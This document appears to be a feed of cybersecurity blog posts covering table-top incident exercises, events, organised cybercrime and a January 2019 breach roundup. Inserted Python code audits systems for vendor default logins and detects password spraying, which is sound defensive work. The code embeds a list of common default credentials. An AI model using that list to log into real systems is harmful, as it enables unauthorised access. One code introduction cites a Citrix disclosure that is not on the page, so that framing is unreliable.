If a picture is worth a thousand words, and video is worth many multiples more, what value is an interactive experience that plants you firmly in the hot seat during a major security incident? Reading about cyberattacks or data breaches is useful, but it can’t replicate the visceral feeling of a table-top exercise. Variously called war-gaming scenarios or simulated attacks, they can be a valuable way of helping boards and senior managers understand the full implications of cyber threats. More importantly, they can shed light on gaps where the business can improve its incident response procedure.

These exercises are designed to be immersive. They might start with a scenario like a board meeting, or a company orientation day. All participants will get a role to play; for the purpose of the session, they might be designated as a head of HR, finance, legal, or IT. As the scenario starts to unfold, a message arrives. The press has been enquiring about a major data breach or a ransomware attack on the company.

Muscles tighten, a wave of nausea passes over the stomach. The fight-or-flight instinct starts to take hold. Your role might say manager, but you don’t feel like you’re in control.

What happens next?

That will depend on how much preparation your business has done for a possible cybersecurity threat. Some companies won’t have anything approaching a plan, so the reaction looks and feels like panic stations. At various points during this exercise, the facilitator might introduce new alerts or information for the group to react to. For example, that could be negative commentary on social media, or a fall in the company stock price.

The exercise should prompt plenty of questions for the participants. What exactly is going on? How do we find out what’s happened? How is this affecting operations? Who’s taking charge? What do we tell staff, or the public, or the media?

A growing sense of helplessness can be a powerful spur to make rapid changes to the current cybersecurity incident response plan (assuming there is one).

Other organisations may already have a series of steps for what to do in the event of an incident or breach. In these cases, the table-top exercise is about testing the viability of those plans. You can be prepared, but do the steps on paper work in practice? Or as Mike Tyson memorably put it, “everybody has a plan until they get punched in the mouth”.

The exercise can show the value of having a playbook that documents all procedures to carry out: “if X happens, then do Y”. This will also shed light on missing steps, such as contact numbers for key company executives, an external security consultant, regulators, law enforcement, or media.

Fail to prepare, prepare to fail

When it comes to developing or refining an incident response plan, the devil is in the detail, says David Prendergast, senior cybersecurity consultant at BH Consulting. Here are some useful questions to ask:

  • If your policy says ‘contact the regulator’, ask which one(s)
  • Who is the specific point of contact at the regulator’s office?
  • Does the organisation have the email address or phone number for that person?
  • Who in your company or agency is authorised to talk to the regulator?
  • What information are they likely to need to have that conversation?
  • Do you have pre-prepared scripts or statements for when things go wrong (for customers, stakeholders, staff, and media, including social media channels)?

It might also force the company into making certain decisions about resources. Are there enough internal staff to carry out an investigation? Is that the most appropriate use for those employees, or is it better to focus their efforts on recovering IT systems?

That’s the value in table-top exercises: they afford the time to practice when it’s calm and you can absorb the lessons. There are plenty of examples of companies that handled similar situations spectacularly badly in full public view. (We won’t name names, but the list includes anyone who uttered the words “sophisticated attack” before an investigation even started.)

By the (play)book

It’s more helpful to learn from positive examples of companies that showed leadership in the face of a serious incident. That can be as simple as a statement of business priorities while an organisation copes with the fallout. In 2017, as Maersk reeled from a ransomware infection, CEO Soren Skou gave frontline staff in 130 countries clear instructions. As the Financial Times reported, the message was unequivocal even as the company was forced into shutting down IT systems. “Do what you think is right to serve the customer – don’t wait for the HQ, we’ll accept the cost.”

Some larger companies will run an exercise just for themselves, while other organisations run joint war-gaming scenarios with industry peers. Earlier this month, financial institutions and trade associations from around Europe carried out a simulated ransomware attack.

According to FinExtra, the scenario took the form of an on-site technical and hands-on-keyboard experience. There were 14 participants at CISO and CIO level, along with many more observers from other companies in the financial sector. The aim of the event was to encourage collaboration and information sharing with other teams and organisations to improve collective defences against cyber threats.

Whether it’s a war-gaming exercise or a table-top event, the goal is the same: to be ready for the worst ahead of time, and to know what steps are available to you when bad things happen for real.

The post Games people play: testing cybersecurity plans with table-top exercises appeared first on BH Consulting.

Upcoming cybersecurity events featuring BH Consulting

Here, we list upcoming events, conferences, webinars and training featuring members of the BH Consulting team presenting about cybersecurity, risk management, data protection, GDPR, and privacy. 

Tech Connect Live 2019: Dublin, 30 May

BH Consulting COO Valerie Lyons will be presenting at this event which takes place at the RDS in Dublin on Thursday 30 May. The conference is a business and technology event, with talks on a range of related subjects happening throughout the day. The event is free to attend, and more than 5,000 delegates are expected on the day. To find out more and to register for a free pass, visit here

Data Protection Officer certification course: Vilnius/Maastricht June/July

BH Consulting contributes to this specialised hands-on training course that provides the knowledge needed to carry out the role of a data protection officer under the GDPR. This course awards the ECPC DPO certification from Maastricht University. Places are still available at the courses scheduled for June and July, and a link to book a place is available here

IAM Annual Conference: Dublin, 28-30 August

Valerie Lyons is scheduled to speak at the 22nd annual Irish Academy of Management Conference, taking place at the National College of Ireland. The event will run across three days, and its theme considers how business and management scholarship can help to solve societal challenges. For more details and to register, visit the IAM conference page. 

The post Upcoming cybersecurity events featuring BH Consulting appeared first on BH Consulting.

The Business of Organised Cybercrime

Guest article by David Warburton, Senior Threat Research Evangelist, F5 Networks

Team leader, network administrator, data miner, money specialist. These are just some of the roles making a difference in today’s enterprises. The same is also true for sophisticated cybergangs.

Many still wrongly believe that the dark web is exclusively inhabited by hoodie-clad teenagers and legions of disaffected disruptors. The truth is, the average hacker is just a cog in a complex ecosystem more akin to a corporate enterprise than you might think. The only difference is the endgame, which is usually to cause reputational or financial damage to governments, businesses and consumers.

There is no way around it; cybercrime is now run like an industry with multiple levels of deceit shielding those at the very top from capture. Therefore, it’s more important than ever for businesses to re-evaluate cybercriminal perceptions and ensure effective protective measures are in place.

Current perceptions surrounding Cybergangs

Cybergangs as a collective are often structured like legitimate businesses, including partner networks, resellers and vendors. Some have even set up call centres to field interactions with ransomware victims. Meanwhile, entry-level hackers across the world are embarking on career development journeys of sorts, enjoying opportunities to learn and develop skills. 

This includes the ability to write their own tools or enhance the capabilities of others. In many ways, it is a similar path to that of an intern. They often become part of sophisticated groups or operations once their abilities reach a certain level. Indeed, a large proportion of hackers are relatively new entrants to the cybercrime game and still use low-level tools to wreak havoc. This breed of cybercriminal isn’t always widely feared by big corporations. They should be.

How Cybergangs are using Technology to Work Smarter and Cheaper

Cybergangs often work remotely across widely dispersed geographies, which makes them tricky to detect and deal with. The nature of these structures also means that cyber attacks are becoming more automated, rapid and cost-effective. The costs and risks are further reduced when factoring in the fluidity and inherent anonymity of cryptocurrencies and the dark web.

The industry has become so robust that hackers can even source work on each link in an attack chain at an affordable rate. Each link is anonymous to other threat actors in the chain to vastly reduce the risk of detection.

IoT Vulnerabilities on the Rise

According to IHS Markit, there will be 125 billion IoT devices on the planet by 2030. With so much hype surrounding the idea of constant and pervasive connectivity, individuals and businesses are often complacent when it comes to ensuring all devices are secure.

Significantly, it is easier to compromise an IoT device that is exposed to the public Internet and protected with known vendor default credentials than it is to trick an individual into clicking on a link in a phishing email.

Consequently, it is crucial for organisations to have an IoT strategy in place that encompasses the monitoring and identification of traffic patterns for all connected devices. Visibility is essential to understand network behaviour and any potential suspicious activities that may occur on it.

Why Cybersecurity Mindsets must Change

IT teams globally have been lecturing staff for years on the importance of creating different passwords. Overall, the message is not resonating enough.

To combat the issue, businesses need to consider alternative tactics such as password manager applications, as well as ensuring continuous security training is available and compulsory for all staff.

It is worth noting that the most commonly attacked credentials are the vendor defaults for some of the most commonly used applications in enterprise environments. Simply having a basic system hardening policy that ensures vendor default credentials are disabled or changed before the system goes live will prevent this common issue from becoming a painful breach. System hardening is a requirement in every best practice security framework or compliance requirement.
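As an added illustration of the go-live hardening check described above (example code written for this page, not F5's), the following Python audits an account inventory against a list of known vendor default logins without needing plaintext passwords: it re-derives each default candidate with the account's salt and compares hashes, and it treats an enabled default account as a finding even when its password has been changed, since the account name alone is what attackers spray against. The default-credential list, the PBKDF2 storage format and the sample inventory are all constructed for the example; a real audit would take the default list from vendor documentation or a maintained source.

```python
import hashlib
import hmac
import os
from dataclasses import dataclass

# Constructed list of vendor default logins for the example. A real audit would
# take this from vendor documentation or a maintained default-credential list.
KNOWN_DEFAULTS = {
    "admin": ("admin", "password", "1234"),
    "root": ("root", "toor"),
    "support": ("support",),
}

PBKDF2_ROUNDS = 50_000  # assumed storage parameter for the example


@dataclass(frozen=True)
class Account:
    name: str
    enabled: bool
    salt: bytes
    pw_hash: bytes  # PBKDF2-HMAC-SHA256(password, salt); an assumed storage format


def hash_password(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def make_account(name, password, enabled=True):
    """Build an inventory entry the way a provisioning system would store it."""
    salt = os.urandom(16)
    return Account(name, enabled, salt, hash_password(password, salt))


def uses_default_password(acct):
    """True if the stored hash matches any known default password for this account name."""
    for candidate in KNOWN_DEFAULTS.get(acct.name, ()):
        if hmac.compare_digest(hash_password(candidate, acct.salt), acct.pw_hash):
            return True
    return False


def audit(accounts):
    """Return (severity, account_name, message) findings; an empty list passes the gate.

    Only accounts whose names appear in the default list are examined: an enabled
    default account with its default password is critical, an enabled default
    account with a changed password is still a warning (disable or rename it),
    and a disabled default account is acceptable.
    """
    findings = []
    for a in accounts:
        if a.name not in KNOWN_DEFAULTS:
            continue
        if a.enabled and uses_default_password(a):
            findings.append(("critical", a.name,
                             "vendor default account enabled with default password"))
        elif a.enabled:
            findings.append(("warning", a.name,
                             "vendor default account still enabled; disable or rename it"))
    return findings


def sample_inventory():
    """Constructed inventory: one unchanged default, one changed but still enabled,
    one disabled default, and one ordinary service account."""
    return [
        make_account("admin", "admin"),
        make_account("root", "correct-horse-battery-staple-7f2a"),
        make_account("support", "support", enabled=False),
        make_account("deploy", "deploy"),
    ]


if __name__ == "__main__":
    for severity, name, message in audit(sample_inventory()):
        print(f"[{severity.upper()}] {name}: {message}")
```

Run as a pre-deployment gate, any "critical" finding should block go-live; "warning" findings are the accounts a hardening baseline would disable or rename even though their passwords are no longer the vendor's.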

Ultimately, someone with responsibility for compliance, audit, or security should be continually reviewing access to all systems. Commonly, security teams will only focus on systems within the scope of some compliance or regulatory obligation. This can lead to failure to review seemingly innocuous systems that can occasionally result in major breaches.

In addition to continual access reviews, monitoring should be in place to detect access attacks. Brute force attacks can not only lead to a breach, they can also result in performance impacts on the targeted system or lock customers out of their accounts. As a result, there are significant financial incentives for organisations to equip themselves with appropriate monitoring procedures.
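The password-spraying tactic cited in the Citrix disclosure earlier on this page (a few common passwords tried against many accounts) and the brute-force attacks this paragraph says monitoring should catch leave different traces in authentication logs. The following Python is an added example, not code from F5, Citrix or Resecurity: it classifies both patterns from a constructed sample of login events. A source that fails against many distinct accounts with only one or two attempts each is flagged as spraying, a source that hammers a single account is flagged as brute force, and a successful login from a spraying source inside the same window is marked as a likely foothold, which is the "limited access" stage the Citrix notice describes. The log format, field names and thresholds are assumptions; adapt the regex and numbers to your identity provider or VPN logs.

```python
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone

# Constructed sample of authentication events; the "key=value" layout is an
# assumption for this example, not any real product's log format.
SAMPLE_LOG = """\
2019-03-04T09:00:01Z auth src=203.0.113.7 user=alice result=FAIL
2019-03-04T09:00:02Z auth src=203.0.113.7 user=bob result=FAIL
2019-03-04T09:00:03Z auth src=203.0.113.7 user=carol result=FAIL
2019-03-04T09:00:04Z auth src=203.0.113.7 user=dave result=FAIL
2019-03-04T09:00:05Z auth src=203.0.113.7 user=erin result=FAIL
2019-03-04T09:00:06Z auth src=203.0.113.7 user=frank result=SUCCESS
2019-03-04T09:05:00Z auth src=198.51.100.9 user=admin result=FAIL
2019-03-04T09:05:01Z auth src=198.51.100.9 user=admin result=FAIL
2019-03-04T09:05:02Z auth src=198.51.100.9 user=admin result=FAIL
2019-03-04T09:05:03Z auth src=198.51.100.9 user=admin result=FAIL
2019-03-04T09:05:04Z auth src=198.51.100.9 user=admin result=FAIL
2019-03-04T09:05:05Z auth src=198.51.100.9 user=admin result=FAIL
2019-03-04T09:10:00Z auth src=192.0.2.20 user=grace result=FAIL
2019-03-04T09:10:30Z auth src=192.0.2.20 user=grace result=SUCCESS
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) auth src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>\w+)$"
)


@dataclass(frozen=True)
class Event:
    ts: datetime
    src: str
    user: str
    ok: bool


@dataclass(frozen=True)
class Finding:
    kind: str       # "password_spraying" or "brute_force"
    src: str
    accounts: int   # distinct accounts that failed from this source in the window
    failures: int   # total failures from this source in the window
    foothold: bool  # a successful login from the same source inside the window


def parse_events(text):
    """Parse log lines into Events, oldest first; lines not matching the format are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append(Event(ts, m["src"], m["user"], m["result"] == "SUCCESS"))
    return sorted(events, key=lambda e: e.ts)


def analyse(events, window=timedelta(minutes=10), spray_min_accounts=5,
            spray_max_per_account=2, brute_min_failures=5):
    """Slide a window over each source's failures and classify the pattern.

    Spraying: many distinct accounts, each with only a few failures (deliberately
    staying under lockout thresholds). Brute force: one account with many failures.
    Thresholds are illustrative and should be tuned to the environment.
    """
    by_src = defaultdict(list)
    for e in events:
        by_src[e.src].append(e)

    findings = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if not e.ok]
        for i, first in enumerate(fails):
            end = first.ts + window
            in_win = [e for e in fails[i:] if e.ts < end]
            per_user = Counter(e.user for e in in_win)
            worst = max(per_user.values())
            if len(per_user) >= spray_min_accounts and worst <= spray_max_per_account:
                kind = "password_spraying"
            elif worst >= brute_min_failures:
                kind = "brute_force"
            else:
                continue
            if (src, kind) in findings:
                continue  # report each source/pattern pair once
            foothold = any(e.ok and first.ts <= e.ts < end for e in evs)
            findings[(src, kind)] = Finding(kind, src, len(per_user), len(in_win), foothold)
    return sorted(findings.values(), key=lambda f: (f.src, f.kind))


if __name__ == "__main__":
    for f in analyse(parse_events(SAMPLE_LOG)):
        print(f"{f.kind:18} src={f.src:14} accounts={f.accounts} "
              f"failures={f.failures} foothold={f.foothold}")
```

On the sample, 203.0.113.7 is reported as spraying with a foothold (five accounts, one failure each, then a success), 198.51.100.9 as brute force against "admin", and 192.0.2.20, a user who mistyped once and then logged in, produces nothing. Keying on the source address is the simplest grouping; attackers who rotate sources can still be caught by running the same logic keyed on the password hash of failed attempts where the IdP exposes it, or on a time bucket across all sources.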

Cybergangs use many different methods to wreak havoc, making it increasingly difficult to identify attacks in a timely manner. Businesses are often ignorant about the size of attacks, the scope of what has been affected, and the scale of the operation behind them. You are operating in the dark without doing the utmost to know your enemy. Failing to do so will continue to put information, staff and customers at risk by allowing cybergangs to operate in the shadows.

David Warburton is Senior Threat Research Evangelist with F5 Labs, with over 20 years’ experience in IT and security.

Cyber Security Roundup for January 2019

The first month of 2019 was a relatively slow month for cyber security in comparison with the steady stream of cyber attacks and breaches throughout 2018. On Saturday 26th January, car servicing and repair outfit Kwik Fit told customers its IT systems had been taken offline due to malware, which disrupted its ability to book in car repairs. Kwik Fit didn't provide any details about the malware, but it is fair to speculate that the outbreak was more likely caused by a general lack of security patching and anti-virus protection than by anything sophisticated.

B&Q said it had taken action after a security researcher found details of suspected B&Q store thieves exposed online and disclosed the issue. According to Ctrlbox Information Security, the exposed records included 70,000 offender and incident logs, which contained: the first and last names of individuals caught or suspected of stealing goods from stores; descriptions of the people involved, their vehicles and other incident-related information; the product codes of the goods involved; and the value of the associated loss.

Hundreds of German politicians, including Chancellor Angela Merkel, had personal details stolen and published online at the start of January. A 20-year-old suspect was later arrested in connection with the disclosure. Investigators said the suspect had acted alone and had taught himself the skills he needed using online resources, with no training in computer science. Yet another example of the low barrier to entry for individuals in becoming a successful and sinister hacker.

Hackers took control of 65,000 Smart TVs around the world, in yet another stunt to support YouTuber PewDiePie. A video message was displayed on the vulnerable TVs which read "Your Chromecast/Smart TV is exposed to the public internet and is exposing sensitive information about you!" It then encouraged victims to visit a web address before finishing up with, "you should also subscribe to PewDiePie".

Hacked Smart TVs: The Dangers of Exposing Smart TVs to the Net

The PewDiePie hackers said they had discovered a further 100,000 vulnerable devices, while Google said its products were not to blame but was reported to have fixed the issue anyway. In the previous month two hackers carried out a similar stunt by forcing thousands of printers to print similar messages. There was an interesting video of the negative impact of that stunt on the hackers on the BBC News website: The PewDiePie Hackers: Could hacking printers ruin your life?

Security company ForeScout said it had found thousands of vulnerable devices using the search engines Shodan and Censys, many of them located in hospitals and schools. Heating, ventilation and air conditioning (HVAC) systems were among those the team could have taken control of after it developed its own proof-of-concept malware.

Reddit users found they were locked out of their accounts after an apparent credential stuffing attack forced Reddit to invalidate passwords en masse in response. A Reddit admin said a "large group of accounts were locked down" due to "anomalous activity suggesting unauthorised access."

Kaspersky reported that 30 million cyber attacks were carried out in the last quarter of 2018, with cyber attacks via web browsers reported as the most common method for spreading malware.

Action Fraud issued a new warning about a convincing TV Licensing phishing email scam making the rounds. The emails use subject lines like "correct your licensing information" and "your TV licence expires today" to convince people to open them. TV Licensing warned that it never asks for this sort of information over email.

January saw further political pressure and media coverage about the threat posed to the UK national security by Chinese telecoms giant Huawei, I'll cover all that in a separate blog post.

